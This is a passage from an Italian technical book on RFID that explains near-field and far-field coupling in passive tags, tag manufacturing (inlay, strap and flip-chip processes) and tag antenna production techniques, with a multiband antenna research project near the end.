per la trasmissione. Piuttosto essi re-irradiano, modulandola, una partedell’energia trasmessa dal Reader che li sta interrogando. Questo fa riferi-mento alla possibilità di modulare un segnale generato dal Reader tramitela variazione dell’impedenza dell’antenna del TAG che trasforma l’antennamedesima da assorbente a riflettente. Tale processo è molto simile all’uso diuno specchio e della luce solare per segnalazioni luminose a distanza.Sfruttando tale principio si elimina anche la necessità di oscillatori loca-

li per generare una portante a radiofrequenza e si riduce pertanto lapotenza necessaria per l’alimentazione del TAG.Per ricavare energia e comunicare con il Reader, il funzionamento dei

TAG passivi si basa su uno dei due principi fisici seguenti:- Accoppiamento induttivo (magnetico) in condizioni di “campo vici-no”: sistemi di questo tipo si basano sul fatto che, per distanze relativa-mente brevi rispetto alla lunghezza dell’onda emessa dall’antenna delReader, nell’antenna del TAG prevalgono gli effetti della correnteindotta dal campo magnetico che varia periodicamente nel tempo.Poiché il TAG viene a trovarsi immerso in questo campo magnetico, ilflusso magnetico variabile nel tempo si concatena con le spire dell’an-tenna del TAG dando così origine, secondo la ben nota legge fisica diLenz, ad una corrente indotta nelle spire. L’accoppiamento induttivotra le antenne del TAG e del Reader avviene quindi in maniera similead un trasformatore. L’energia ricavata da un siffatto trasformatore,viene usata per attivare il TAG. Per ottenere le condizioni di “campovicino” alle distanze operative impiegate, vengono generalmente sfrut-tate le bande con maggiore lunghezza d’onda, ovvero LF ed HF.

- Accoppiamento elettromagnetico in condizioni di “campo lontano”con effetto backscatter: sistemi di questo tipo si basano sul fatto che,per distanze relativamente lunghe, rispetto alla lunghezza dell’onda

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE99

II.2

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 99

Page 94: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

emessa dall’antenna del Reader, nell’antenna del TAG prevalgono glieffetti del campo elettromagnetico, che varia periodicamente neltempo.L’antenna del TAG riflette parte della potenza elettromagnetica ricevu-ta. Questa può essere rilevata dall’antenna del Reader. Il fenomenodella riflessione delle onde elettromagnetiche è conosciuto come back-scattering ed è simile a quello su cui si basa il funzionamento dei siste-mi radar. Per ottenere le condizioni di “campo lontano” alle distanzeoperative impiegate, vengono generalmente sfruttate le bande conminore lunghezza d’onda (UHF, SHF).

“CAMPO VICINO” & “CAMPO LONTANO”Si è visto come i TAG passivi operino con modalità diverse, a seconda chesiano progettati per operare in “campo vicino” o in “campo lontano”.Il compo EM totale è la somma di due termini, uno relativo alla radia-

zione ed uno di tipo statico.Nella regione di campo lontano prevale il termine di radiazione mentre

nella regione di campo vicino prevale il termine statico.Infatti nella regione di campo lontano il campo EM si propaga global-

mente come un’onda sferica, che, per aree limitate viene approssimata adun’onda piana.Nella regione di campo vicino, invece, non si riscontrano le caratteristi-

che di un’onda che si propaga, ma prevalgono quelle di un campo “stati-

RFID - Fondamenti di una tecnologia silenziosamente pervasiva100

II.2.1

Figura II.7Accoppiamento induttivo

(campo vicino) bande LF & HF

Figura II.8Accoppiamento elettromagnetico

(campo lontano) UHF

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 100

Page 95: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

co” i cui valori rispecchiano istante per istante quelli della sorgente.Il confine tra campo vicino e campo lontano è legato alla lunghezza

d’onda (λ) e alla dimensione (D) dell’antenna trasmittente. Le relativedefinizioni sono le seguenti:- Regione di “campo lontano”:• Distanza TAG–Reader >> λ• Distanza TAG–Reader >> D• Distanza TAG–Reader >> 2D2/λ

- Regione di “campo vicino”:• Distanza TAG–Reader ≤ λ

In pratica altri fattori riducono questo confine ai valori illustrati intabella.

TECNICHE DI PRODUZIONE DEI TAGLe tecniche di produzione dei TAG possono prevedere vari processi diassemblaggio che consentono, a partire dal chip, di realizzare TAG finitied adattati all’applicazione per la quale sono destinati (cfr. Fig. II.9). Ilprocesso più comune, usato nei TAG incorporati in etichette e smartcard, prevede:- un substrato di materiale elettricamente isolante e permeabile alleonde EM (carta, PVC, PET, ecc.);- sul substrato viene depositata l’antenna realizzata con inchiostri con-duttori o direttamente in metallo (argento, alluminio, rame);

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE101

Tabella II.2Regioni di campo vicino e campo lontano per

differenti frequenze

II.3

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 101

Page 96: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

- successivamente il chip con l’elettronica del TAG viene connessoall’antenna con l’uso di tecnologie tipiche dei circuiti ibridi (wire bon-ding, flip chip, ecc.)- infine viene sovrapposto uno strato di materiale protettivo (laminazio-ne in PVC, resina epossilica, carta adesiva, ecc.) per proteggere controabrasioni, corrosioni ed urti.

Questo proceso viene comunemente chiamato chiamato “Inlay pro-cess” (intarsio) e viene illustrato in dettaglio nel paragrafo che segue.Successivamente viene illustrato un rilevante dettaglio, che riguarda laconnessione del chip RFID; il processo, molto usato per includere chip ememorie nei circuiti ibridi, viene chiamato “Flip Chip Process”.

PROCESSO DI ASSEMBLAGGIO “INLAY”L’assemblaggio di antenna, chip e substrato in di un TAG RFID vienespesso chiamato “Inlay” (intarsio). Questo processo viene illustrato inFigura II.10 in cui sono distinti l’assemblaggio di antenna, chip e substra-to dalla successiva produzione di etichette RFID o contactless Card.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva102

Figura II.9Processo di assemblaggio nei TAG incorporati

in etichette e smart card [4]

II.3.1

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 102

Page 97: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

In questo processo si possono distinguere essenzialmente due tecniche:- Direct Chip attach (chip to antenna): chip assemblato direttamentesull’antenna.- Strap attach: chip assemblato su un modulo (strap); successivamentelo strap viene montato sull’antenna.

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE103

Figura II.10Flusso di produzione di TAG passivi (smart

label, RFID tickets ecc.)–Fonte: Muehlbauer AG

Figura II.11Panoramica di TAG in rotoli, dopo il processo

di produzione INLAY, pronti per essereincorporati in etichette con il processo Label &contactless card production (cfr. Figura II.10)

a sinistra in alto HF – LAB IDa sinistra in basso – LAB IDa destra in alto – Impinj Inc.

a destra in basso – Alien Technology

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 103

Page 98: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

3.1.1 Direct Chip Attach (chip to antenna):

- E’ il processo più usato ed affidabile sia in UHF che in HF.- Il chip (bumped) viene prelevato dal wafer e connesso meccanica-mente ed elettricamente all’antenna.- Il processo è reel to reel.- Il Flip Chip Process è utilizzato con collanti ACP (ACF) o NCP.- Basse percentuali di scarto.- Produttività (tipico UPH 10.000) legata alla dimensione ed alla dispo-sizione delle antenne.- Linee di produzione costose.

3.1.2 I processi che richiedono un modulo intermedio (STRAP)

Spesso il chip viene montato su un modulo intermedio “Strap” che in unsecondo tempo viene a sua volta connesso con l’antenna . In questo casosi hanno due fasi:- Strap to chip:• Il chip (bumped) viene prelevato dal wafer e connesso meccanica-mente ed elettricamente allo strap.• Il Flip Chip Process è utilizzato con ACP (ACF) o NCP.• Il processo più accurato è svolto dalle aziende produttrici di semicon-duttori.• Tipico UPH 20.000

RFID - Fondamenti di una tecnologia silenziosamente pervasiva104

Figura II.12Flusso di produzione di TAG passivi, i processi

“Chip to strap” e “Strap to antenna” .) –Fonte: Muehlbauer AG

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 104

Page 99: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

- Strap to antenna:• Lo strap viene connesso meccanicamente ed elettricamente all’antenna.• Minore accuratezza/competenza richiesta.• Linee di produzione meno costose.• Criticità dovute a doppia connessione.• Esistono numerosi brevetti che ne limitano lo sviluppo.

3.1.3 Metodi senza connessione elettrica

Questi metodi fanno riferimento alle antenne del tipo “Inductivelycoupled loop” descritte in § III.4.1.2- Il chip (bumped) viene prelevato dal wafer e connesso meccanica-mente ed elettricamente ad un modulo (ad esempio: loop). .- Questo modulo viene poi accoppiato ad una seconda antenna senzaconnessione elettrica (accoppiamento induttivo/capacitivo).- Vantaggi: possibilità di ottimizzare il processo più critico (Flip ChipProcess) eseguito sempre su uno stesso modulo.

3.1.4 Metodi con antenna stampata sull’oggetto

Uno scenario futuro, che prevede una considerevole riduzione dei costidel TAG, prevede lo scorporo del processo produttivo dell’antenna daquello dell’etichetta. Il metodo fa ancora una volta riferimento ad anten-ne del tipo “Inductively coupled loop” descritte in § III.4.1.2- Il chip (bumped) viene prelevato dal wafer e connesso meccanica-mente ed elettricamente ad un modulo.Nell’esempio in figura il modulo, oltre al chip, contiene la parte di accop-piamento d’antenna relativa alla tecnica “Inductively coupled loop”.- La parte radiante dell’antenna (“radiating body” con riferimento a §III.4.1.2.), ovvero il dipolo UHF, viene stampata direttamente sullaconfezione dell’oggetto da identificare.- L’applicazione del modulo sull’antenna avviene come un normaleprocesso di etichettatura in fase di produzione avendo solo cura dirispettare le distanze prescritte dalla tecnica “Inductively coupledloop” (§ III.4.1.2).

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE105

Figura II.13Un esempio di “Strap”

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 105

Page 100: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

FLIP CHIP PROCESSComunque venga realizzato l’Inlay process, il passaggio sicuramente piùcritico riguarda la connessione del chip RFID con il substrato e l’anten-na. Il processo più usato è chiamato “flip chip” (cfr. Figura II.15); sitratta di un tipo di montaggio usato per semiconduttori, chip o memorieche prevede l’uso di solder bumps (protuberanze per saldatura) alposto dei consueti wire bonds (fili di connessione). I solder bumps sonodepositati sul lato superiore del wafer di silicio dal quale vengono rica-vati i chip. I chip vengono quindi separati dal wafer e montati, “facciasotto” ("flipped"), sul substrato, opp. sull’antenna . opp. sul modulo delcircuito al quale sono destinati; la connessione elettrica del chip avvieneattraverso i solder bumps.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva106

Figura II.14Tecnica di separazione tra chip su modulo e

dipolo radianteFONTE:LAB ID

II.3.2

Figura II.15Chip RFID assemblati tramite Flip Chip

Process

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 106

Page 101: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Nelle tecniche più tradizionali, invece, (“wire bonding”) il chip vienemontato “faccia sopra” e connesso con fili.I solder bumps possono essere assemblati in vari modi (cfr. Figura

II.16); particolare importanza rivestono i processi che prevedono adesiviper bloccare il chip. A questo scopo vengono usati due classi di prodotti:- adesivi con particelle conduttive (cfr. Figura II.17), che garantisconole conducibilità tra i bumps ed il substrato/antenna. Si dividono in:• ACF (Anisotropic Conductive Film)• ACP (Anisotropic Conductive Paste)- adesivi non conduttori (cfr. Figura II.18), in cui i bumps devono eseresaldati al substrato/antenna:• NCP (Non Conductive Paste)

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE107

Figura II.16Esempi di differenti tipi di connesione del

chip tramite i solder bumpsFonte: Flip-Chip Technology;

http://extra.ivf.se/ngl/documents/ChapterB/ChapterB1.pdf

Figura II.17Processo di assemblaggio del Chip RFID con

l’uso di adesivi del tipo ACF o di ACP

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 107

Page 102: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva108

Figura II.18Processo di assemblaggio del Chip RFID con

l’uso di adesivi del tipo NCP

Figura II.19Fasi tipiche del Flip Chip Process, dal prelievodel dispositivo dal wafer al posizionamento

sull’antenna.

Figura II.20Microfotografia di un chip di TAG HF

montato sull’antenne a spira con processoFlip-chip

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 108

Page 103: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

ANTENNE NEI SISTEMI RFID

Un ruolo di grande rilevanza nei sistemi RFID passivi, è giocato dalleantenne del TAG e del Reader. Le antenne infatti sono la fonte primariadi energia per i TAG ed i problemi di orientamento e polarizzazione,influiscono significativamente sulle prestazioni. In questo capitolo si illu-strano le più comuni tecniche di produzione delle antenne e le problema-tiche connesse. La trattazione tecnica di dettaglio sui problemi di propa-gazione del segnale radio e del dimensionamento delle antenne nei TAGpassivi, specie per le problematice del trasferimento di energia, verrà inve-ce svolta nella successiva Parte III − Accoppiamento, Energia e Antennenei TAG passivi.

MATERIALI E TECNICHE DI PRODUZIONE PER ANTENNE DI TAG PASSIVI

Per quanto riguarda i materiali di costruzione delle antenne dei TAGpassivi, queste vengono generalmente realizzate in metallo inciso, o condeposizione sul substrato di inchiostro conduttore. Una tecnologiaalternativa prevede un’antenna in filo di rame applicata direttamente sulsubstrato. A volte, per TAG ad accoppiamento induttivo a bassa fre-quenza (LF) vengono impiegati avvolgimenti in filo su nucleo ferroma-gnetico.Le prime due tecniche sono impiegate sia per TAG ad accoppiamento

induttivo che elettromagnetico, la terza trova applicazione prevalente perTAG ad accoppiamento induttivo, la quarta è, come detto, è principal-mente riservata alle basse frequenze (LF).

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE109

II.4

II.4.1

Figura II.21Antenne di TAG HF (13,56 MHz) [4] per

etichette di carta con antenne in inchiostroconduttivo all’argento - ASK (Francia)

Figura II.22Schema di principio di un TAG LF e realizzazione

commerciale, vedi anche fig. I.17ENSIDE Technologies

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 109

Page 104: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

Figura II.25Antenne ad inchiostro conduttivo. La tecnicaper la produzione delle antenne è la stampaserigrafica, con inchiostro conduttivo a base

di argento. Ha vantaggi per la flessibilitàpoiché consente di ottenere antenne di

qualsiasi forma e dimensione ed è utilizzabileanche per piccole tirature - SIAR (Italia)

La maggior parte delle antenne per TAG passivi, sia di tipo elettroma-gnetico che di tipo induttivo, sono prodotte chimicamente incidendo sot-tili lastre di rame (Cu) o di alluminio (Al) con procedimento simile a quel-lo dell’Acquaforte adottato nelle incisioni artistiche.Successivamente le antenne così ottenute vengono laminate al substra-

to del TAG (pellicole di poliestere, carta, ecc.). I limiti di questo proces-so di produzione sono il costo, la lentezza e le condizioni ambientali(impiego di acidi).Una tecnologia competitiva è la stampa delle antenne con inchiostro

conduttivo. Questa è basata sull’impiego di colle (inchiostri) che conten-gono un’alta concentrazione di particelle d'argento. Questo processo tut-tavia è attualmente ancora costoso ed i suoi limiti sono costituiti dallabassa conduttività elettrica degli inchiostri, dalle proprietà deboli di ade-sione, dalla mancanza dell'esattezza di stampa dovuta alla corrosione delleparticelle d'argento.Esistono numerose formulazioni di inchiostri e metodi per applicarli.

In genere l’inchiostro è formato da un “pigmento” conduttivo (argento,oro, rame, alluminio) e da una resina con funzione legante del pigmentoal subtrato; inoltre l’inchiostro contiene un solvente volatile per facilitarele operazioni di stampa.Delle antenne a filo metallico si dirà nell’apposito paragrafo.Riassumendo, le antenne per i TAG del tipo etichetta sono realizzate in

rotolo su supporti flessibili (PET, carta ecc.) ed i processi di fabbricazio-ne più comuni sono descritti nella tabella che segue.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva110

Figura II.24Antenne di TAG HF (13,56 MHz) [4] per

etichette di carta con antenne in inchiostroconduttivo all’argento - ASK (Francia)

Figura II.23Antenna in filo di rame

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 110

Page 105: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE111

ANTENNE PER I TAG AD ACCOPPIAMENTO ELETTROMAGNETICO

Le antenne dei TAG ad accoppiamento elettromagnetico sono general-mente dei dipoli progettati anche per favorire il Backscatter.Per un trasferimento ottimale dell’energia, la lunghezza del dipolo deve

essere pari a multipli della lunghezza d’onda. In via ottimale dovrebbeessere uguale a λ/2, il che comporta (per la banda UHF media) unadimensione intorno ai 16 cm. In realtà il dipolo è spesso costruito a λ/4,accordandolo con varie tecniche, comunque deviare da questi sottomulti-pli di lunghezza d’onda comporta gravi perdite di prestazioni.A proposito delle prestazioni, difficilmente le specifiche tecniche o gli

standard forniscono i valori di due importanti parametri connessi alleantenne dei TAG:- Sensibilità energetica (energizing sensitivity) indica l’energia del campoEM necessaria al funzionamento del TAG.

- Riflettività (reflectivity) indica il rapporto tra potenza RF incidente eriflessa dall’antenna del TAG.

II.4.2

Tabella II.3Tecniche di realizzazione delle antenne dei

TAG passivi

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 111

Page 106: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva112

Questo comporta problemi nella valutazione di TAG differenti realiz-zati con i medesimi chip.Per quanto riguarda il problema della polarizzazione (cfr parte III), a

volte si opera per rendere i TAG UHF meno sensibili alla polarizzazionedel campo EM ricorrendo ad una antenna con due dipoli sistemati inposizione ortogonale come illustrato in Figura II.30 o con altre soluzionicome in Figura II.31. Questo dovrebbe minimizzare la sensibilità allapolarizzazione del segnale incidente.

Figura II.26TAG UHF con antenna a dipolo λ/2,

lunghezza ≈≈ 16 cmAlien Technology

Figura II.27TAG UHF “Butterfly” Class1 UHF; con antennaa dipolo λ/4 in rame, dimensioni 76x76 mm

UPM Raflatac

Figura II.28TAG UHF “Squiggle” Gen 2 disponibile per diversi package

inclusi prodotti contenenti metallo o acqua, antenna adipolo λ/4, dimensioni 97mm x 11mm

Alien Technology

Figura II.29TAG passivo, banda dei 2,4 GHz,

dimensioni 30x6 mmIntermec Inc

Figura II.30TAG con antenne ortogonali - Matrics

Symbol Technology

Figura II.31TAG UHF “2x2”, Omnidirezionale, progettato

per applicazioni controllo bagagli edequipaggiamenti negli aeroporti, dimensioni

47 x 42 mm, il relativo diagramma diradiazione è stato illustrato in fig. III.19

Alien Technology

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 112

Page 107: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE113

ANTENNE PER I TAG PASSIVI AD ACCOPPIAMENTO INDUTTIVO

Per quanto riguarda il dimensionamento delle antenne a spire, i fattori dimaggior influenza sono costituiti dall’area dell’antenna a spire e dalnumero di spire. Come si vede dalla formula riportata in Figura III.1.1, latensione indotta ai capi dell’antenna del TAG è direttamente proporzio-nale al numero di spire ed al flusso del vettore induzione magnetica.Quest’ultimo, a sua volta, è calcolato sull’area della spira. Poiché generalmente l’area che complessivamente può occupare l’anten-

na costituisce un vincolo di progetto, l’aumento del numero di spire è limi-tato dalla conseguente riduzione dell’area all’interno delle spire medesime. Con le tecnologie produttive standard presenti sul mercato, non è pos-

sibile “giocare” molto sul numero di spire e sulla distanza tra di esse.Questo perché un’antenna stampata occupa già di per sé un certo spesso-re sul foglio che risulta maggiore rispetto, ad esempio, a quello occupatoda un antenna a filo (Figura II.38). Quando si aumenta il numero di spire,l’area all'interno dell’antenna si riduce rapidamente; non è quindi possi-bile spingersi oltre un certo limite.

4.3.1 Problematiche produttive

Nei processi precedentemente descritti (antenna stampata o realizzatacon metallo inciso, cfr. §II.3) il chip viene applicato su un’antenna pre-formata. Le possibili problematiche che si manifestano tale approccioproduttivo sono le seguenti:- Il cambiamento di formato dell’antenna risulta costoso.- L’antenna stampata è realizzata mediante la sovrapposizione di mate-riali diversi che hanno uno spessore abbastanza contenuto, comemostrato in Figura II.32. Lo strato inferiore, costituito di metallo spes-so qualche decina di µm (micron), è il piano di massa che fa da riflet-tore e da base per l'alimentazione; subito sopra si inserisce uno stratodi materiale dielettrico, solitamente più spesso del precedente, ed infi-ne un altro strato metallico spesso poche decine di µm dal quale si rica-va l'elemento radiante vero e proprio.Il layer dell'antenna non è pertanto compatibile con molti dei materia-

li usati per il substrato.

II.4.3

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 113

Page 108: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva114

- Il settaggio delle apparecchiature per l’incisione o la stampa è lungo edifficoltoso.

- Il crossover indebolisce il prodotto, riducendo le prestazioni. Il crosso-ver è un ponte elettrico (Fig. II.33 e Fig. II.34) che partendo da unestremo dell'antenna a spira, attraversa la medesima per collegarne l’al-tro capo. Si evince chiaramente che, trattandosi di piste realizzate coninchiostro, è necessario un ponte in quanto la pista della spira dopouna serie di giri, non può tornare al punto di partenza attraversando lealtre spire già disegnate. Questo è invece fattibile con l’antenna a filo,come si può notare dalla Figura II.38.

Un ulteriore svantaggio delle tecnologie produttive basate su antennecostruite con metallo inciso o stampate con inchiostro conduttivo, riguar-da la prototipazione dei nuovi modelli di TAG.Risulta infatti difficile produrre campioni e quantitativi di prova a costi

e tempi ragionevoli, specie considerando sia la varietà di dispositivi RFID(cards, smarttickets, smartlabels, TAG, ecc.), sia il fatto che, per ogniapplicazione, è necessario un particolare formato: per il layout, per ilmateriale, per lo spessore, per le resistenze chimiche/fisiche, ecc.

4.3.2 Antenne in filo di rame

Una tecnologia produttiva completamente diversa da quelle sopra elenca-te, è quella basata sull’antenna in filo di rame, che viene applicata diretta-mente sul substrato.

Figura II.32Componenti principali di un'antenna

stampata

Figura II.33Crossover o ponte in un TAG induttivo – LAB

ID (Italia)

Figura II.34Crossover o ponte

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 114

Page 109: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE115

Secondo questa tecnica, i TAG vengono creati direttamente sul sub-strato: carta, cartone, carta sintetica, film plastici (PET, PE, PVC, PP, PU,KAPTON, etc.). Il materiale del substrato può essere scelto a secondadell’applicazione: flessibile o rigido, sottile o spesso, trasparente, opaco,colorato o precedentemente stampato.Il processo è guidato da macchine e software progettati e realizzati per

lo scopo specifico. Si hanno in tal caso grande flessibilità nella forma, nelledimensioni, nella posizione del chip e nella frequenza di risonanza perchèquesti macchinari sono stati studiati appositamente per tale applicazione.Quindi, partendo da un formato standard (quale il formato card) si posso-no modificare le forme delle antenne (in piccole, grandi, corte, lunghe, aspirale, rotonde, formati speciali, etc.) a seconda dell’applicazione richie-sta, la frequenza di risonanza (quindi numero di spire e distanza tra di esse)la posizione del chip, per necessità di stampa, sul TAG, apportando sem-plicemente delle piccole modifiche al software di progettazione. Il cambiamento di formato può essere utile per facilitare la lettura dei

TAG nei casi in cui la prossimità di alcuni materiali (metalli per esempio)determina una variazione della frequenza di risonanza.Fasi di costruzione del TAG:

- Il chip è incollato sul modulo. Il modulo è un supporto plastico lami-nato in rame, in genere delle dimensioni 10x2 mm e dello spessore di84µm, costituito da due piccolissime piazzole centrali su cui vengonosaldati i piedini del chip. Le piazzole vengono riportate con dimensio-ni maggiori all’esterno per consentire la connessione con gli estremidell'antenna.

- Il modulo è applicato ad un substrato ed un’antenna in filo di rame èrealizzata dinamicamente, pronta per un'ulteriore modifica.

- I terminali dell’antenna vengono sovrapposti e saldati al modulo (rea-lizzando implicitamente anche il crossover).Per come è costruita l’antenna, cambiare il formato risulta semplice e

veloce. Inoltre possono essere modificati anche altri parametri come adesempio, per necessità di stampa, la posizione del chip.Addentrandosi nei particolari costruttivi dell’antenna a filo, si possono

evidenziare gli aspetti seguenti:

Figura II.35Esempi di antenne a filo in diversi formati

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 115

Page 110: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva116

- Un filo di sezione rotonda presenta prestazioni migliori rispetto ad unodi sezione piatta.

- Non sussiste il problema del crossover in quanto il filo viene saldatodirettamente sul modulo.

- A parità di numero di spire gli avvolgimenti risultano più vicini di quel-li ottenibili con altre tecniche, l’efficienza di area risulta pertanto mag-giore (Figura II.38).

4.3.3 Confronto tra tecniche ad incisione ed a filo

In questo paragrafo vengono proposte alcune figure allo scopo di evi-denziare le differenze del processo di produzione delle antenne di TAGpassivi ad accoppiamento induttivo, tra la tecnica ad incisione (INLAY)e la tecnica a filo (INLAY-LESS). Queste tecniche consentono di realiz-zare antenne a spira le cui caratteristiche sono state precedentementediscusse.

Si sottolinea il fatto che TAG molto piccoli non possono essere creaticon il processo INLAY né, tanto meno, TAG troppo grandi, che risulte-rebbero troppo costosi.Con la tecnica produttiva a filo ed usando prodotti termoplastici, i due

strati vengono saldati (accoppiati) senza l'uso dell'adesivo ed il TAG risul-ta completamente integrato.Per terminare il confronto, si propone la Figura II.38, che mette in evi-

denza, a parità di numero di spire, la differenza tra un’antenna stampataed un’antenna a filo ed in particolare l’area occupata nei due casi.Circostanza analoga si ha considerando la distanza tra le spire: nell’avvi-cinarle è necessario tenere presente comunque lo spessore intrinseco diciascuna di esse. Si comprende quindi come le antenne a filo ottengano

Figura II.36Tecnica ad incisione (INLAY)

Figura II.37Tecnica a filo (INLAY-LESS)

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 116

Page 111: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE117

prestazioni migliori, che si riflettono in maggior distanza di lettura e, aparità di distanza, una maggior energia disponibile per alimentare il chipdel TAG.

4.3.4 Un esempio di nuove soluzioni realizzabili con tecnologia del filo

In Figura II.39 è illustrato un TAG ad accoppiamento induttivo (frequen-za HF) per l’uso in braccialetti o collari monouso non manomettibili.

Quando il TAG è aperto (come in figura) , il layout dell’antenna a spirache ne risulta, non consente la sintonia del TAG sulla frequenza di lavo-ro, di conseguenza il TAG non può operare.Il braccialetto/collare si attiva richiudendo le due parti una sull’altra

con un adesivo permanente.Una volta chiuso il TAG, cambia il layout dell’antenna a spira che

risuona alla frequenza desiderata.Qualsiasi tentativo di rimozione del TAG, interrompe i fili e provoca la

distruzione dell’antenna.

Figura II.38Confronto tra antenne; si noti che, a parità dinumero di spire, in antenne a filo (a destra)

si possono ottenere avvolgimenti più vicini e,conseguentemente efficienze di area

maggiori rispetto ad antenne tradizionali (asinistra)

Figura II.39TAG ad accoppiamento induttivo per l’uso in

braccialetti o collari monouso nonmanomettibili

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 117

Page 112: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva118

ANTENNE MULTIFREQUENZA E SENSORISTICA AVANZATA NEL PROGETTO

INTELLISENSE RFID

Un programma di ricerca congiunto svedese, norvegese e finlandese(Nordite 2005-2010), gestito congiuntamente dall’agenzia svedese perl'innovazione (Vinnova), il consiglio della ricerca Norvegese (Rcn) e l'a-genzia finlandese per il finanziamento all’innovazione (Tekes), sta finan-ziando un progetto chiamato “IntelliSense RFID”(www.intellisenserfid.com ). L’iniziativa IntelliSense Rfid comprende vari gruppi di ricerca, Sintef in

Norvegia (Leader del progetto), VTT in Finlandia, Chalmers Universityof Technology e IMEGO AB in Svezia e gestisce un budget di 2,3 milio-ni di euro. Il progetto IntelliSense si propone di sviluppare TAG, probabilmente

passivi, di nuova generazione, che integrino alcune innovazioni sostanziali:- Comunicazione multifrequenza:almeno nelle bande HF (13,56 MHz) ed UHF media (868 e 915 MHz),probabilmente anche UHF alta (2,5 GHz).

- Integrazione di sensori di temperatura, umidità, pressione, Ph e altrecondizioni ambientali, alcuni dei quali appositamente progettati.

- Capacità di comunicazione multiprotocollo (uso dello stesso TAG perdifferenti applicazioni) ed ad alto bitrate (specie nel funzionamento inbackscatter).In particolare la necessità di antenne multifrequenza discende da quella

di operare in una grande varietà di ambienti:- “RF friendly” (prodotti in carta o plastica con contenuto scarso o nullodi acqua e metalli).

- “RF semi friendly” (prodotti farmaceutici o elettronici che richiedonoun’attenta collocazione dell’RFID affinché questo possa operare incondizioni ottimali).

- “RF semi unfriendly” (ovvero in ambiente assorbente per le frequenzeUHF come cibo fresco, frutta o, in generale, prodotti con alto conte-nuto di acqua o liquidi).

- “RF unfriendly” (ovvero in ambiente riflettente per le frequenze UHFcome metalli o, in generale, prodotti con alto contenuto di metalli).

II.4.4

2-ParteIInew.qxp:RFID 5-09-2008 10:55 Pagina 118

Page 113: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE II - CARATTERIZZAZIONE E TECNOLOGIE COSTRUTTIVE119

I risultati di maggior visibilità, finora conseguiti nel progetto,riguardano la prototipazione di sensori di nuova generazione e diantenne multibanda [56], [57].Per quanto riguarda i sensori si rimanda a

www.intellisenserfid.com/sensors.htm, per le antenne multibanda, nesono state progettate due: - una da VTT che copre la banda HF 13,56 MHz con funziona-mento induttivo, e la banda UHF media, con funzionamento in back-

scatter, alle frequenze europee 867 MHz e americane 915 MHz;- una da Chalmers University che si presenta come un’antenna frattaleper le bande UHF media (alle frequenze europee ed americane) ed altaalle frequenze di 2,45 GHz probabilmente per compatibilità con i TAGISO 18000-4.L’antenna VTT, progettata nel 2006, è una combinazione di una parti-

colare antenna multibanda ad accoppiamento elettromagnetico, la cosid-detta PIFA (planar inverted F antenna) (cfr. §III.4.2.2) progettata per labanda UHF media, con funzionamento in backscatter, alle frequenzeeuropee 867 MHz e americane 915 MHz, con un’antenna ad accoppia-mento induttivo (a spira per i 13,56 MHz).Gli elementi dell’antenna sono stati progettati insieme al front end a

